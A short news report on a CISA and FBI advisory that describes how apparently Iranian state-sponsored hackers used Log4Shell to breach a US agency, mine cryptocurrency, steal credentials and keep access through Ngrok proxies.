According to new reports, Iranian state-sponsored hackers compromised the network of an unnamed United States government agency. The initial breach is believed to be February 2022, and the hackers have used the compromised government network for cryptocurrency mining until July 2022.
The Department of Homeland Security (DHS) responded to the breach in June to begin cleaning the targeted network and remove the crypto mining software. The FBI and DHS’s Cybersecurity and Infrastructure Security Agency (CISA) stated in a public advisory that the “cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server.”
The hackers then “installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.
CISA and the FBI provide the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help the public detect and protect its networks against similar compromises.
CISA has an Iran Cyber Threat Overview and Advisories webpage for further details on Iranian government-sponsored hacking activities.
Despite CISA ordering agencies to remediate the Log4Shell vulnerability in December 2021, this attack demonstrates the delay in cyber threat awareness, response, and detection of hacks.
It is unknown what the ultimate motive of the alleged Iranian government-sponsored hackers was.
